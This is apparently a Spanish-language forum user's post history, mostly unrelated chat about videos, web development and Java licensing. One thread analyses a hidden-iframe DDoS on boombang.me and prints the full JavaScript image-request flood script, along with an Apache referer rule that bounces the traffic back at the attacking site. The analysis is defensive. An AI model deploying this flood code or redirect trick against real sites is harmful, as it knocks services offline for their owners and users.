Mensajes

Es un area para experimentar con nuevas armas (si, alienigenas). Dicen que si entras ahí no sales nunca. Solo una persona logro escapar pero le lavaron el cerebro..
[youtube=640,360]http://www.youtube.com/watch?v=bgOMk6lBAq0[/youtube]

Saludos

Creo que la condena es tan alta porque son menores.. de todos modos WTF .. los pericos no paran de publicar nombres a punta pala y nadie dice nada ·_·

Saludos

See.. pero si no, no despiertan el interes de los lectores.. los que quieran el tumblr:
http://moviecode.tumblr.com


PD: Esa imagen es de Super Man 2 tal y como se menciona en la fuente
http://www.wired.com/underwire/2014/01/movie-fake-code

Saludos

si la armas, y la armas bien, e incluso incluyes tus propias teorias locas... puedes hacer un buen flujo de conspiranoicos a tu pagina, con publicidad daria buenos dividendos

Me recuerda a mundodesconocido xDDD

Saludos

Es posible. le doy 3/10 para wordpress.. smf es que da pereza siquiera desarrollar para el.. es tan.. anti-social que da cosa tocarlo ·_·

https://developers.google.com/+/hangouts/writing

Saludos

Muestra codigo.

Saludos

Gracias por vuestras respuestas pero entro a su web y no encuentro la línea de código de @Drvy podéis decirme donde se encuentra?

Código (aa) [Seleccionar] Expandir

view-source:http://boombang.me/esp/cliente.php

Linea 76 para ser mas específicos.

Como hago para denegarlo, por favor ayudame

no he probado pero puedes hacer que Apache niegue o redireccione a todo el que tenga de referer esa pagina (boombang.me). También puedes agregar una excepción que niegue o redireccione si la url contiene msg=robandocreditos (un mensaje gracioso que deja el atacante xD).

Esto sirve: http://foro.elhacker.net/php/anti_dos_ddos_en_php-t399902.0.html    ??

Eso es una protección muy primitiva que solo sirve para hostings que no disponen de otros recursos (htaccess, firewall etc..). Vamos, en tu caso podria funcionar, pero hay métodos mas "bonitos" de hacerlo y no llegar a usar PHP (ya que esa es la ultima linea de defensa de tu host).

Como he dicho, lo que hace ese script es crear mil requests en forma de imagenes a tu server.. lo que puedes hacer es detectar el referer y en caso de que provenga de el, negarlo o redireccionarlo.

Ejemplo.

Código (apache) [Seleccionar] Expandir

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %1%{HTTP_REFERER} boombang\.me/(.*)?
RewriteRule ^.*$ http://boombang.me/%1 [R=301,L]
</IfModule>

Esto hara que si el referer viene de boombang.me/cualquiercosa lo redireccione permanentemente a su propia url ·_·.. En teoría se estaría haciendo DDOS a si mismo xD

Parece que el ataque se esta realizando únicamente desde un servidor. Si tienes acceso a apache deniega la ip del origen de ataque con deny from y adios  

El realidad el ataque proviene de los visitantes de ese servidor.. no del propio servidor. Entonces eso no serviría de nada.

Saludos

El problema dato000 es que la licencia de Java entra en conflicto directo con las distros libres de GNU/Linux... por muy gratuita que sea, no es libre.. y el quiere correr jdownloader en esas distros..

No se pa que hacer el esfuerzo de usar una distro totalmente libre para instalar software privativo ·_·

Saludos

Efectivamente esa pagina esta llevando acabo un DDOS.

Código (aa) [Seleccionar] Expandir

view-source:http://boombang.me/esp/cliente.php

Código (html4strict) [Seleccionar] Expandir

<iframe src='ddosputo.php' height='0' width='0' style="borders: none; display: none"></iframe>

La cual tiene:

Código (html4strict) [Seleccionar] Expandir

<meta http-equiv="refresh" content="60;URL=ddosputo.php">

Código (javascript) [Seleccionar] Expandir

<script type="text/javascript">
function random() {
var count = 0;
var result = "";
var length = Math.Floor(Math.Random() * 100);
var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz";

for (var i = 0; i < length; i++) {
var num = Math.Floor(Math.Random() * chars.length);
result = result + chars.substring(num, num + 1);
}

return result;
}

(function () {
var fireInterval;
var requestsHT = {};
var isFiring = true;
var targetURL = "http://boomkong.tk"
var requestedCtr = 0, succeededCtr = 0, failedCtr = 0;

var makeHttpRequest = function () {

if (requestedCtr > failedCtr + succeededCtr + 1000) {  return; };

var rID = Number(new Date()); var img = new Image();
img.onerror = function () { onFail(rID); };
img.onabort = function () { onFail(rID); };
img.onload = function () { onSuccess(rID); };

img.setAttribute("src", targetURL + "?id=" + rID + "&msg=robandocreditosokase-lol");
requestsHT[rID] = img;  onRequest(rID);
};

var onRequest = function (rID) { requestedCtr++; };
var onComplete = function (rID) { delete requestsHT[rID]; };
var onFail = function (rID) { succeededCtr++; delete requestsHT[rID]; };
var onSuccess = function (rID) { succeededCtr++; delete requestsHT[rID]; };

isFiring = true;
fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(200) | 0));
})();
</script>

Pero no parece que estén atacando a tu foro.. o al menos no en este momento.



Defenderte de ese ataque.. no he probado pero puedes hacer que Apache niegue o redireccione a todo el que tenga de referer esa pagina (boombang.me). También puedes agregar una excepción que niegue o redireccione si la url contiene msg=robandocreditos (un mensaje gracioso que deja el atacante xD).

Al fin y al cabo lo que hacen es crear imágenes (miles xD) con ruta el sitio al que atacan.

Slaudos

gNewSense igual funciona porque incluye varios interpretes java (jdownloader es java) libres.. pero igual no. Es que entras en un conflicto bastante gordo.

Esas distros estan libres de cualquier software/firmware privativo. Java es privativo.

Saludos